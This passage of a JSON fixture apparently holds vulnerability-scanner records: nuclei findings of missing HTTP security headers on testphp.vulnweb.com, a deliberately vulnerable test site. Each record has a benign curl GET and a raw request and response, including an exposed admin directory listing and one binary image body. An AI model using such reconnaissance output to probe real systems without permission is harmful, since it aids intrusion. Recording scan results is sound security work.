page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 850, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50' 'http://testphp.vulnweb.com/hpp'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/hpp", + "discovered_date": "2024-11-13T02:42:12.429Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /hpp HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:40 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<title>HTTP Parameter Pollution Example</title>\r\n\r\n<a href="?pp=12">check</a><br/>\r\n\r\n<hr>\r\n<a href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'>Original article</a>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 851, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01", + "discovered_date": "2024-11-13T02:42:12.619Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 852, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/1.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/1.jpg.tn", + "discovered_date": "2024-11-13T02:42:12.814Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/1.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4355\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-1103"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001b\u0002\u0002\u0003\u0001\u0006\u0001\u0005\u0003\u0004\u0007\u0002��4\u0010\u0002\u0001\u0003\u0004\u0001\u0003\u0003\u0003\u0003\u0004\u0001\u0005\u0001\u0002\u0003\u0004\u0011\u0005\u0012!1A\u0006\u0013Q"a�\u0014q�2��#BR��\u0016b�����\u0019\u0001\u0003\u0001\u0001\u0001\u0001\u0002\u0003\u0004\u0005��)\u0011\u0002\u0002\u0001\u0003\u0002\u0005\u0004\u0003\u0001\u0002\u0003\u0011\u0004!1\u0012A\u0005\u0013Q��2aq�"3���\f\u0003\u0001\u0002\u0011\u0003\u0011?�>��n?�����8ԝB�w\u0018Va�9������]��.�H�n\t ��r2s�\u0006��P\u0003z��8��j�����\u0006$}#����W\t��������{��c ʸʮ<����׹Er�\n/�I���j�&���dY\u0019@�W��#�r>�Ϛ��lN^}�\u0015�#3(|g�p0rpO��f��}%%�\u0006kIE�f�\u0010�\u0003��\u0007\u001f��\u0006�zf��^�C%Ƕ�\u0019\u00140;C\u001d�\u0018�?���z�\\\\[��\u00025�y.\\�\u00169۟�8\u001fڮ�?�\u0019L3\\���\u0019#\u00110�\\x��8�#�\u001b�Z\u0015Ʃ|�\u001e5 夑�����դ�=>�\u001bI�i�;�����\n2\u0006\u0007۳�O^(����b�P�.��_fEUR\u0002}9��r6����>j�g�$g�\u0017$�\u000e�{��[�L���9�,sXi&\u0014y���T�b*E\u0014VH��퍌�I,���E��0\u0007\u0007���?�\u0015�;��\u0017]�J�X��Fd���������$`c��2�0գ�7\u0016�nח"ј;2�����p;'9\u0018�z�\u0014�/����[)�3Z�orEY\f�\u001e|\u0011�q�|\u001e��a\u001e�u$-\u000bJ�\u001f;��p����\u0001�T���"�M��1�06�ۉ\u0001O�g\u001c���N�>����,�]�%ܰ��H\u0010s�O������\u0015S�z�i�%�@��@G�\u0007`,@#'�C����Z���:��l\u0004�X�X������.\u0014�A�U�\\6i\nٱ��-~"2ƂDP��`�\u0003�\u0001��V׿\u0015\u0014$�m��Isr�0Uf��\u0014\u0003��.�sq���g���]�8\u001fj�\u0006��b�/,�\u001e��]B\u0015"��\nS�p��>3�\\S����q�6�RI[\u000258��\u000b�;�\u001d����L�����<bDxAiJ�&�n8\u000b�\u0007���' f��C����,jR\u0018�\u0015Oǎ\u0007\u0003�:���+\u001fO�b��\u0017z��F\u0014�\u000bI\u0003,b1�S#$\u00022\t�3�q�� ^\u0016$�'��\u001e�ԭ�-೾�i���*��\u0013g\u00039##����5��?L�H�D��O�Iw�S}D��\r�pz��\u0010�A�K����\u001a�a�to�^���v�~�1���<�\u000f�U\\Zl�h�%�\u001e񊫊o4�暮�KD��S��a�,�"�r\\\u0004\u001f�T\u001f<\f���\u001aV�K��'�*qEn��\u0014b��(�Վ\f�\u0018�3�g\u0015Ҵ�\u001d,\\$�E���}��\u00021�O\u001d�ۏ���\u0004]'G����x!wH�\u0007j��|����f�\u0017����\u0004wz\\x\u0018B���\u0014dy��G��-��r���>L�MR�!���Kh�$&]�I�\u0002\n�s��?ǐ+�kz5����=�R�\u0007!b�NJ�\u001b�\u001dq�s�8\u00184�t�m���\u00067�wb�\t`���{\u0001����I��\u001e��\u000f�9�,c�����q�$\u0003�\u001dW.�R�\nO+��4�\u0017\b��\u0018�r.\rx���!\u0014�;=U�iw6:��Ȼ�\u0019L{�K#\u0010q��`�:6\u000eFA\u001eE8zwVKM6In�nj2�]Ý���Dn8�>Oc5\u0018K`�:��v�|Q�^\u0018/\u00034�$\n�\u0007\u0005�\f\u001bpny�<\u001a痷r\\\\<�9wc��&�k[��\u0006Q"�ޥ\\0��u��\u001e\b�Wf�\u001cD\u0005���Oep�[?�(���~����yđ�wl�Vf6��+����?�s���)\u0017LA-�1�<��&��\u0019��\u0001��8ìZ�@�~�\f�!̲�k���/dp{㓎�\t�%��a�\u001d6\u001d2���0̒��G\u0004��C\u0002\u0001� �>|��t�:E��Q�\u000b\u001a���6�L\f�$�\u0007\u0007�y�)�H���{\u0010�H6)�\u000fy\u0004�`�)\u0003h�����{�r(�#���RA)�\u001cřd���o\u0001p-�<��x.��O\f�e���(�/z��ؘ��wq\u000e"���F\u0006>��|�r\t\u0002��4��O��sfR~�]�t\b��?a��:w�4x�.\f���!V}�˲��;\u001c��\u0006G\u001d\u000e�k\u0016���jV�]�JZ(�%L�\u0001\t�r<a8�?�B��+�ㇷs4� i~�7�t���d\u0019\u0018�\b�x+�'\u0019?P��\u001e2E%ݻ[L�9R��ӑ�>z|�5\u000bq�\u000bKkt@[q+�\u000e�\u0004\u0003�􁜌��y4�:\u0016bO&�knK,ViԨɬ�>z5�S�)�\u0002�@���X㳑�\t\u0016P�\u0007,��\u001f���M�庂�&�$�\t�r\u0007A�\u0012r8�����S�\\Igw\u0015�\r�H��8�4æIst�\u000f#���,��\u0007��+��U��/^�'��Y���'�h\u001c�\u0019�X��H'�v9�`�x�\r^oOI,m\u0014L���u\u000b�-���1����\u0018,:��jz}�\u0007�)\u0019�\u001aC�\u0002O��$���ƥo4A^DuG��*@lw������\te�m��2e\u001d��f#\u001d��j�\u0019�\u0015�*���#\u0019�\u001a�\u0004+�YZy\u001a\u0015��1�$)<\u0003��5"�c&�'4f�4S��k=��o4r�p����\u000e\b��ׯJpj��\u0006�L�w�\u0007�e0��Vy\u0002`g�����'�N����u�V��,��7��'���\u0015=tx��iV�RM>�$Aj��G�I!�\u0010U�…\u0003\u0019�$\u001e���*�mF{۝�;I+vO%���4��6y�\b<\u000f����ԯ�!�b�$��x���?���U�Ko��q���@���\u0016f\\*㑜\u0001���I�4��i��IyܤQ��Ҿ��X`\u0005’A�'\u0004`.y��/�]���������:��6��\u001f�g\b��4i-�z:�\u0011gP��Q�0�\u0011��i���'���dG[�\u001c�\u001fO8a�\u0006F\b�{��t}D���5\b��0!��\u0012�\f9\u001d���2s�5�u\r>�loo��]\u001cY���+.v�>��(@�\u0001 \u0013�L'�t��9Y��Ts��5�5l�\u000b�"m�\u001c���p���L\f��5�o48�NE;U%��,��m\u0007h�'�@�y\u0002�}R ��-���\n�pO\u001f�5�U��h��\u0015��X���N>��㑭g\u001704�!V�����\u001fW�O�\u0007��\u000bk\t\u0007���%[Y�C\u0012��A]Č\u0010A�G�]\u001a����\u001eL��Y�9�cX��I!��VF#*\u0003.\u00187\u001fP<�\t�<�Ց�I}$�"��v��\n��>�x�d���\r�\u001f��M�u�}+�\b \u001f�\u0003���\u0019M�'��Y#�f%[�[�>j��6�\u0007,4�y\u001elVh�Y-��H��\u0019��d��c����\u0003A4~夤{������}�^�ۊ�Y\u0011\u001c��\u0005\u0015��\u0014\n��p\u0013S�E\u0015D\u0003�bO<��\u001b�0e8 �V1R*ѐ\u0006���.�m\u0004�Os ���s�6H]��`����3U\u000b1' �x⽣\u001c��%���?W�g�2�"F�#�����\u0003�'��O4v�i�1\u0012_N��=�\u0006��\u0004p>9?\u001d�+���Moq\u001c�\u0001d`ps��W\u0010����sp=ûs�O?��?���Dlk+op�t��Ew�Z_��ݐ�`VN\u001c�[ \f�\u0015�x��rMd�ZD~��3%�O�4�7>�3�\u0007�dc\u0019$p<Ҷ����xgc��xQ�\u0001�4Ţ�q������p#Q�?[s�\u001cu��k�zkj�:^%�v\u0019I7��U�"�{�ɍF��BeKd}\u0001�F@a���\u0003����ۙIPpA��NWZ�\u0017��\u0015U}�m��\u0004���H\r�Ć\u0004s�?��Wv*\u0016K�ܬ,#۵]���9;A\u0003�9.y'�ZuҩF\u001a����3�x34�(���C\u0004;�\b�`%m��\u0001���#?I\f�x2��\u0002=�\u0018�\u0005?$\u001c���x,e�BM\u0019u_i�\u001fKl�>\u0006_�� \u000f��]&����H�Ssl�tI&0�7\u0001���:\u001eǒ9\u0015\u001d.��3�M���C(���Lѣ}>v��*�1��>�\u0007\u0018$�0r\t�~�i\u001d��ΰF�2��񗍷3`+\u0012�\u0018��\u0001�H�HQ��ʉmqs��gEf�-��\u0007gh*3�2�\u001b\u0003��q�5����M�2-�˔"Ux�,Y��v\n��\u001c\u000e2AbR��6�J���=���[�7�\u0014Q]�\u000f\u0014T�*�\f(��t\u0002EM@�\u0015D\u0002jS��Ed�I���32���b=\u001a�\u001a\u001cV�)���\u0001�\t?�o۱\u0015\u001a5���XZU�p$3\u001e8\u001f�\\�\u0002x�Y����12��\u0003r�?��Գ��8=ؼ�Ք�e9\u0004v*���,\u0011f�����8l6d!rz\u0019$*��\u0001�+oC���޳J�y\u0002'��(9w��\u0007�\u001f��\u0004�[S�\u0016{d���tL^!�\u0014ۺ �;X�Ct�#\u001e;�'��k����uHu\u001cn��4n�b\u000b\u0013�9�!o(H�V$�g�!�0\u0007q\u0019��}D�:��\bw�VT`Tgk\u00021�\u001f�����rj��k�'��K\u0016f\u0003h����[J�v�\u001bk�� �,b\u0011Š�&a����X\u0012�2�I��\u0002��T|>��i4����l��\n���;eܜu���|�E��ܶ$�v�\u0001$�N\u0007\u0003�O��}Ci\u001a\u0004��9�l2ZE*I?lq�羱Ks[�\u0014�Ӵvq��z��ȩǂMcc�QE\u0015ć\n�(��I4\n(�@&�E\u0015X����O��Ьo4幞6i"i\u001c�\\H\u0001L+\u000f�OX<��\n+Zڎ�B�Ⱦ�a@\u0019�x�\u001d\n\b澉%@�͂��)���\u000e�V�h�����\u0011��!=�\f\u001e?����wcmh���\r�6|1<}L\u0015G�@\n\u0007�\u0014Q^}�~fs��!�\u0005��#����يX����WyB�<��=\u001c�\u0019��j�Ԓ46dE�W�#*�\u0002D�s��~�\u001c�sE\u0015��b��7-�I�"�\u00126��A\u0006�4]��]\u001b��5�\bcx��1�ъ�\u001c�t��A�S���Ez>3�\u000b�%|���MSF���\n�I�rG��1�I�:żp��l\u0017r�\u0017\u0001��\u0002�\u0015�\u001fO\u0003��\u0001�\u0002�(�j�K�������", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 853, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36' 'http://testphp.vulnweb.com/admin'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/admin", + "discovered_date": "2024-11-13T02:42:13.008Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /admin HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:35 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /admin/</title></head>\r\n<body>\r\n<h1>Index of /admin/</h1><hr><pre><a href="../">../</a>\r\n<a href="create.sql">create.sql</a> 11-May-2011 10:27 523\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 854, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01", + "discovered_date": "2024-11-13T02:42:13.205Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 855, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop", + "discovered_date": "2024-11-13T02:42:13.398Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<html>\r\n<div id="content">\r\n\t<div class='product'><table><tr><td width='180px'><img src='images/1.jpg'></td><td width='400px'><a href='Details/network-attached-storage-dlink/1/'>Network Storage D-Link DNS-313 enclosure 1 x SATA</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/network-attached-storage-dlink/1/'>Price<br>359 &euro;</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/2.jpg'></td><td width='400px'><a href='Details/web-camera-a4tech/2/'>Web Camera A4Tech PK-335E</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/web-camera-a4tech/2/'>Price<br>10 &euro;</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/3.jpg'></td><td width='400px'><a href='Details/color-printer/3/'>Laser Color Printer HP LaserJet M551dn, A4</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/color-printer/3/'>Price<br>812 &euro;</a></td></table></tr></div></div>\r\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 856, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2", + "discovered_date": "2024-11-13T02:42:13.590Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 857, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36' 'http://testphp.vulnweb.com/cgi-bin/status'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin/status", + "discovered_date": "2024-11-13T02:42:13.786Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin/status HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 858, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L", + "discovered_date": "2024-11-13T02:42:14.027Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: 